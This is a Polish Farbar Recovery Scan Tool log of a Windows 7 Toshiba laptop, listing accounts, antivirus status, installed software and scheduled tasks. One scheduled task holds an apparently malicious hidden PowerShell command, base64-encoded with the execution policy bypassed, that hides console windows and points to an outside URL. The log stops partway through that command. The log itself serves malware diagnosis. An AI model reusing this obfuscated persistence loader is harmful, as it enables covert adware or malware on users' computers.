Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:31-12-2015 Uruchomiony przez Niagara (2016-01-03 17:29:05) Uruchomiony z C:\Users\Niagara\Downloads Windows 7 Home Premium Service Pack 1 (X64) (2015-11-22 14:31:40) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1581660641-4088170054-1556520515-500 - Administrator - Disabled) Gość (S-1-5-21-1581660641-4088170054-1556520515-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1581660641-4088170054-1556520515-1003 - Limited - Enabled) Niagara (S-1-5-21-1581660641-4088170054-1556520515-1001 - Administrator - Enabled) => C:\Users\Niagara UpdatusUser (S-1-5-21-1581660641-4088170054-1556520515-1000 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Kaspersky Internet Security (Enabled - Up to date) {B41C7598-35F6-4D89-7D0E-7ADE69B4047B} AS: Kaspersky Internet Security (Enabled - Up to date) {0F7D947C-13CC-4207-47BE-41AC12334EC6} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Kaspersky Internet Security (Enabled) {8C27F4BD-7F99-4CD1-5651-D3EB97674300} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 15.12 (x64) (HKLM\...\7-Zip) (Version: 15.12 - Igor Pavlov) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.) Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.45.2 - Adobe Systems Incorporated) Advertising Center (x32 Version: 0.0.0.2 - Nero AG) Hidden Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION) Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.42 - Broadcom Corporation) CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform) ENE CIR Receiver Driver (HKLM\...\2C293EC1A06665BB961CBA4EC7AFF4BF2BEAD042) (Version: 2.7.4.1 - ENE) Galeria fotografii usługi Windows Live (x32 Version: 14.0.8081.709 - Microsoft Corporation) Hidden ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.7.1002 - Intel Corporation) Java(TM) 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.) JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.44.1 - JMicron Technology Corp.) Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{77E7AE5C-181C-4CAF-ADBF-946F11C1CE26}) (Version: 16.0.0.614 - Kaspersky Lab) Kaspersky Internet Security (x32 Version: 16.0.0.614 - Kaspersky Lab) Hidden KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.0.3.1 - PandoraTV) LibreOffice 5.0 Help Pack (Polish) (HKLM\...\{DAFA943C-07EF-44E2-8C53-AB5A7EEDC955}) (Version: 5.0.4.2 - The Document Foundation) LibreOffice 5.0.4.2 (HKLM\...\{8C3F291E-AA0A-4188-A83F-1D97103AE27C}) (Version: 5.0.4.2 - The Document Foundation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (Polish) (HKLM-x32\...\{95120000-00AF-0415-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41105.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{306B39C9-3AB1-4161-8567-9C7E50B41AE3}) (Version: 9.7.0621 - Microsoft Corporation) Mozilla Firefox 43.0.3 (x86 pl) (HKLM-x32\...\Mozilla Firefox 43.0.3 (x86 pl)) (Version: 43.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.3.5835 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) Narzędzie do przekazywania usługi Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation) Nero 9 Essentials (HKLM-x32\...\{acb2f3f2-d190-4abc-93ad-61d8fbb9a662}) (Version: - Nero AG) Nero BackItUp (HKLM-x32\...\{0420F95C-11FF-4E02-B967-6CC22B188F9F}) (Version: 5.2.21001 - Nero AG) Nero BackItUp and Burn (HKLM-x32\...\{E08CC458-41FB-4BB5-9B08-2C83DB55A5B9}) (Version: 1.2.0030 - Nero AG) Nero BurnRights (HKLM-x32\...\{397516AE-7DFE-4F90-84E0-BD616D559434}) (Version: 3.6.26001 - Nero AG) Nero Express (HKLM-x32\...\{6C3CF7AC-5AB0-42D9-93C0-68166A57AFB6}) (Version: 9.6.16000 - Nero AG) Nero RescueAgent (HKLM-x32\...\{51E2F9B3-A972-4F58-B4EF-4D9676D9F5D1}) (Version: 2.6.25002 - Nero AG) Nitro Reader 3 (HKLM\...\{9EA981E5-EE67-4662-86F1-58937D31FE07}) (Version: 3.5.6.5 - Nitro) NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.56.34 - NVIDIA Corporation) NVIDIA PhysX (HKLM-x32\...\{B83FC356-B7C0-441F-8A4D-D71E088E7974}) (Version: 9.09.0428 - NVIDIA Corporation) Opera Stable 34.0.2036.42 (HKLM-x32\...\Opera 34.0.2036.42) (Version: 34.0.2036.42 - Opera Software) Pakiet zgodności dla systemu Office 2007 (HKLM-x32\...\{90120000-0020-0415-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Photo Service - powered by myphotobook (HKLM-x32\...\eu.myphotobook.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.0.7-279 - myphotobook GmbH) PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation) Poczta usługi Windows Live (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation) Podstawowe programy Windows Live (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden Program TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.6 - TOSHIBA Corporation) Program TOSHIBA HDD/SSD Alert (Version: 3.1.64.6 - TOSHIBA Corporation) Hidden Program TOSHIBA HDD/SSD Alert (x32 Version: 3.1.64.6 - TOSHIBA Corporation) Hidden Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.19.409.2010 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6069 - Realtek Semiconductor Corp.) Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated) Toshiba Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.11 - TOSHIBA CORPORATION) TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{C14518AF-1A0F-4D39-8011-69BAA01CD380}) (Version: 1.6.07.64 - TOSHIBA Corporation) TOSHIBA ConfigFree (HKLM-x32\...\{1777CCDA-F2F2-4A77-ACF4-0B7341229BBB}) (Version: 8.0.29 - TOSHIBA Corporation) TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 for x64 - TOSHIBA Corporation) TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.2.11.64 - TOSHIBA Corporation) TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation) TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.6C - TOSHIBA CORPORATION) TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.22C - Nazwa firmy) TOSHIBA Hasło administratora (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.9C - TOSHIBA CORPORATION) TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.4 - TOSHIBA Corporation) Toshiba Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version: 10.01 - TOSHIBA) TOSHIBA Media Controller (HKLM-x32\...\{983CD6FE-8320-4B80-A8F6-0D0366E0AA22}) (Version: 1.0.80.3.64 - TOSHIBA CORPORATION) TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION) TOSHIBA Online Product Information (HKLM-x32\...\{2290A680-4083-410A-ADCC-7092C67FC052}) (Version: 2.09.0001 - TOSHIBA) TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.6.0.64 - TOSHIBA Corporation) TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 x64 - TOSHIBA Corporation) TOSHIBA Recovery Media Creator Reminder (HKLM-x32\...\InstallShield_{773970F1-5EBA-4474-ADEE-1EA3B0A59492}) (Version: 1.00.0019 - TOSHIBA) TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{A0E99122-25C1-4CA4-9063-499A2A814EB6}) (Version: 1.6.06.64 - TOSHIBA Corporation) TOSHIBA Remote Control Manager (HKLM-x32\...\{FEB650EB-7639-444E-9FC2-C33EE6ED1A37}) (Version: 3.0.1.0 - TOSHIBA CORPORATION) TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.1.40 - TOSHIBA) TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.1.3 - TOSHIBA Corporation) Toshiba TEMPRO (HKLM-x32\...\{2B000B80-A3FA-4B92-A5FF-D9AD402B6701}) (Version: 3.30 - Toshiba Europe GmbH) TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.3.4.64 - TOSHIBA Corporation) TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Utility Common Driver (x32 Version: 1.0.52.1C - TOSHIBA) Hidden Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation) Windows Live Sync (HKLM-x32\...\{2E522ED6-01E2-4207-82D5-B3BFB31B8BD4}) (Version: 14.0.8089.726 - Microsoft Corporation) WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {11564D2C-FED2-4F59-BB28-905E9B66C55C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated) Task: {24EA2AED-C9DB-46AD-923F-B892F4A1B749} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd) Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {6FFE8282-207D-4943-B111-0C89925F44B8} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-22] (TOSHIBA CORPORATION) Task: {78BBFEB3-5F59-43F5-A5BB-BCBB7C137DB5} - System32\Tasks\Opera scheduled Autoupdate 1451237964 => C:\Program Files (x86)\Opera\launcher.exe [2015-12-15] (Opera Software) Task: {AD6065F3-B1B6-4CA8-940A-1EBC1C346AE3} - System32\Tasks\{7F7D0F47-047A-0A05-7811-0A087D78110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADQARAAwAGUAbABaAHgAeQBVAGYALQAxAEgAMABIAHUAXwBTAFAAVgA4AGcAYQBpAHAAcwAwADUATwAtADgAVwA5ADcAWgBkAHIAdABoAE4ASwBMAEkARwBZAGoAawBXAE0AMABrAGUAOABjAE4AWQBiAHQASABfAFQATAAwAFgAUgBOADYAUwBzAEoAXwBjAC0ARABUAGgAbgBrAEwANgBkAGUAcwA1AEcASQBPAHIAUgB3AHUAXwBUAFAAMABZAF8AeQBfAG0AWQBlAHMAXwBGADEAUQB4ADkANABuAGYAQwA4AC0AagBWAEUAWQBNAFUAQgBNAHkAcAA0AGYAUQBrAGUAOABYAEIAMgBBAGIAWQAtAGQAcgBUAHEAYgAzAHMAcgBjAFgAWgBQAHUANABsAFAAUgBqAGoAdABTAGcAbABFADkASABhAGEAUABwADIAYgA4AE0AdwBMAGgANwAyADIARwBTAEEAVgBrADUAawBzAFcAZABrAC0AQwBRADUAbQBmAHYAeQAxAGoAbABkAEwARQBQAHUAbQA1AEgAMABtAC0AUgBMAGcAUwB4AGcALQB5AHgAQQA4AEUALQBCADYAZQB5AEMANQBNAHcAYQBsAGkAVgB2AEYAagBmAFgAVgBGAFMAZgB0AGUAegB0AFkAbwB1AGQAbAAxAGcAcQB3AHAAeAB5AE8AagBDAFQAUQBGADEAWABMAFMAZgB6AHoAQgB2AHYANQBWAEEAUwAwAE4AOABWAEoAdQBIAHAATgBCAFUAaQBWAGQAdgBFAHAATQAzADkASwBLAHIAYgBvAFIAVAB0AEgARgBLAGIAQgBWAGUAOABxAFgAWgBvAGIAdQBfAGEAUQAyADMAZQBKAFcATQBYAHQANgB6AFEATwBYAEsAOQB2AE0AegAxAGIAbgBfAHQAbABLAFQAbAAzAE0ATwBZAEQAQwBJAFIAcwBuAHgASQBhAC0AaQBlAHIAVgA4ADAAMQBLAFcAagBqAC0AVABGAEEALQBoAHYARQAtAHMAQwBSAFQAVgBrAHEAcwBQAGoAYQBnAFIAcQBvAGwASABzAFAASQBjAHAAOQBTADgAdQBpAF8ATQBLAFAARABmAGwAYwA1AFMAOABDAEoAeQBQAGEAeAAxADIAYQB1AFcAegBwAHoAZwBEAEgAMAB3AE0AUwBNAF8AYwByAEcAbgBPAHgATwBvAG0AdgBzAHUAWgBlAGQAbABWAE4ANgBoAG8ATQA0AE8AZgBjADcAeQBKAFYARwB6AEEANgBIAHUAOQAxAFEARgBSAHMAZABQAGgALQB4AEMAaAByAFAAcgB6AHcARgA5AGIAOQBaAFUARgBVAFUAZAB6AGwASQBnAFgATAAtAEsASwBpAGwAYgBXAHMAVQB6AGcAdwBTAG0ASQBRAHkATwBHAEYAUgBXAHgAcwB0AGcAegByAHcASgA5AEoAdAB5AEMAWQBMAHUASQBXAFgAMQBlADQAdwBqAHEARABCAHQAVABBAHoAXwBBAHIAZQBNAG4AcgAzAEYAYQBtAGwATABkAFcAagBjAFcAawBPAGYAUABkADgAcQBkAHYAVAA2AEMAeQA5AEwAcwBJAEEAbwBiAG8AZQBZADgASQBwAG8AMwByAG4AWAB3AGQAVwBlAEMAUABFAGIAbwBJAEMAOQByAGIAZABtAHIAQwBiAE4AdwBHAHQAMQAwAHMAWgBpAGwAXwBjAFQAZQBiAGsAWQBMAHkAQQBWAFoALQB1AGkAXwA5ADMAQgBpAFkAdAAwAGwAQgAzAHgAOQBKAFEAYwBUAEQAcABuAHAAOQBPADAAdwA4AGUAagBxAG4ATQBvAHAAXwB1AFgALQBUAE8AcABmAFkANQBQAFkAQwB0AHkAZgBOAHEAbgA1AE4AUABTAFUAOABiAEMAbgBwADcAUwB3AFAAdQA4AHcAUwAyAE0AWQB5AEsAawBpAFMAbwBWAG0AYwB1AEgAcAB0ADQAegAxADEAaABNAG4AMwBMAHQASQBTAHEAawA3AEkAbQB5AGcAZgBLADcAbQA0AHYAcwBSADAAMgBIAHAAbwBKAHoAXwBXADcAUwBrAE4ASQBEAE4ARgBoAGcAZwBYAEkAQgB5AEsARQBxADIAVQBQAGwAYQB3AHgAZAB6AEMAbQBHAHkAYgBEAEkARQBWAHIANgBuADEAUABzADcAVgBtAFkAcQBCAEoATgBFADUAMQByAGkAQwBpAFQAOABVAFUAVQBHAFcAQQBKAFoAVQBBAGQAcgBlAGoALQBMAHgAVQA1AEIANQB6AFYAUwAzADEAQQBiAGoAbABTAEsAbABPAG8ASABfAHUAOABpAHUAJgBjAD0AZwBkAFAASABRAGIAZgBXAEsAeABIAGIARwA2AGkAbQBiADcAbwA5ADEAUgBDAGEAaQBxAHgAbgBtAG8AUgBlAEgAUgBVAG8AdABtAEsAMQAzAE8AaABaAFQAegBCADUASgByAHIASABGADIAZgBPAEwAdQB3AHMAZQB1ADIAZwB2ADcAUgA4AGEAQQBjAGoAMgBRAHQAbgBxAC0AegBTADgAOQBMAHMATAAxAEIAegBLADUARgBzAFgAQgBNAE4AUwB4AGcAYQA3ADYAMwBIAGIAMAByAGEAVwBEADEANQBwAGkAVABXAGQAMQA3AHoASwBoAEgAbABMAG4AXwBNAGwAUwBIAHIAMAB0AG8ARABqAGIAUQBzADAAQgBRAEUATQBrADYAMgB2AEEAWQA1AEsAVQBFADEASQBNAEUAUwBWAGQAdQBkAEgAZgBXAHAAbwByAGkAZQBhADgAVgAwAEEASgBVAHAAbwBhAGgAaAAyAGgAUwBoAFQASwBkAEUAMwBaAEYAawBxAFkAUABVAHQASQBYAEEAMwBQAFcAQQBCADgAQQBRAEsAYwBFAFQATABRAHEAVwB5AGMAYwBOAGUASQBNAEkAXwA2AFEAegBTADMALQAwAF8AMgAzAHgARQA4AF8ASwBmAHUAMgBjAEUANwB4AHMAWABGAF8ALQB5ADcANAB4AE4AZwAyAG0ASQBtAHIARAB6AFQAZgBBAGoAYQBrAGwAMQBGAEoAZgBYAEMARgBKAGoAegBZAGkAbgBqAEQALQAzAGQAcQBLAFEAYgBCAHcARQB0AFIARABMAGIASwBiAG0AWQBMADEAUwA2AFAAeQBzADYAQQBkAHIAaQB1AEwAUABMAF8AQgBpAEQAMABNAFcAdQBKADAARABvAE4ARABHAHcAdAA2AFEATwBqAGUAUABYAHMAUQA3AGgAYgBIAHkASwBqADgAMABMAEkARQB5ADcAeABTAFUAeABHAHUAVQBxAHgAdABjADEAQwBDAE8ATABOAHcAbwBSADYAVABLAE0AbABSAHIAMwBuAEcAOABQAHIAbABBAFYAagBHADgAbgAwADIAOQBkAFkAagBxAGsAMQBFADMAUgBVADYARgBOAEsAMwBwAEsARQBmADgAMQBaAGMASABIAEkAaQBwAE4AUQBXAFcAVwBSADkASABLADkAVgBqAEgAdgBqAEUAWQBfAFUAYwBuAE8AUwBKAG8AZQB4AEMAMQBRAEEANQBxAGsAMQBsADEAdwBmAE0ATwBxADIAUwBtAFkATgBtAGgARwBLAEoAWgBLAGoAcwBTAGwAcwAxAHoATgBCAEUATABIAE0ATwAxAE8AagAzAGEAdwBhAGEAbwBUAEEAWgBlAFcAaQA2AEUALQA3AG4AcwBLAEEAYgB3AGsARABIAHYALQBIAEgATQBEAG0AVwB3AHAARABSAGsANQBZAHQAWgBTAEMATQA2AF8AaAA1AHkAcgBPAEYAVQA0ADQAdQBnAHAAZAAzAC0AcwB5ADcAOABEAGEAYgBvAEEANwB4AGUAYwBoAEYAZAA3AHEAdgBmAG8ANgAtAG0AZQA5AE0AegBHADgAMgAyAEsASQBYAC0AZABQAHUAMQBFAHQAZQBFAGsATQA1AEUAYQBkAEUAVABuAFUALQBEADcAeQBwAFgARgBIAEsAcgBTAE4AVQBmAFIARwBXAHYATgBTADAARABSAEwAMwBpAE0AOQBYAGkANABjAE8AVwBBAHUASQBqAEQAQgBuAFYATQBLAGgAawAwAEoAdwBTAEgAdQBXAGcAVQB4AEcAZABKADMAdwB6AFIANQBsAGkAdQBDAFcAVAA2AGoAVQBUADMAWABEADgAYwBYAEwAMABFAGcAWAByAEQARABJADkARQBuAHcAMABaADcAeQBsAEIASQBRAE4ANgBfADIAeQBnAHYAZwBKAHQARgA4AEYAUwBvAGEASQB6AHoANABiADQANQAyAGQASQBTADkAdQBqADQASABqAFUAMQBaAFEAdgBQAC0AdwBsAEQARABqAEYANQBwAFIAaQBGAFkATQAwAG8AegB6AEkATQBFAHYANgBrAGwAQQBkAC0AWABEADMASQBEAFkAUwBjAFUAMQBLAFIAeQB5AE0AUgAzADAASAA1AEEAZwAwAHoAVwA0AGYAOAA2AHoAMQBQAGIANwBoAGMAawA5AEIAWABMAFkAaQBoAHcAWQB1AF8AMwBEAFEAaQBDAHgANgBnAHQAbwByAC0AagB6AHAAegBBAE8ANAA5AHcATQBIADkALQBEADgAUQBnAHYAbQBpAE8AVgBPAGUAOABFAGwARgBaAGUAOQByAE8AZQBCAEoAMQBSAE4AdgAtAG0AdwBLAGIAbgBOADQATQBxADAAdQBrAE4ATAB4AHAAMABVAC0AXwBjAGUAdQBHADAAVQBtAGUAQQB6AHAASgBaAEoAeQBRAEMAbwBWAEQAQwBPAEQAVQAxAFkAQgBqAEcAWgBwAFcAWgBNADAAJgByAD0ANAA3ADUAMQA1ADgANwA4ADAAOQAxADcANwAwADUAOAA2ADIANgAiADsAJABzAHQAcwBrAD0AIgB7ADcARgA3AEQAMABGADQANwAtADAANAA3AEEALQAwAEEAMAA1AC0ANwA4ADEAMQAtADAAQQAwADgANwBEADcAOAAxADEAMABBAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBOAFoAMQAyAFMAWQAxAFMAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0A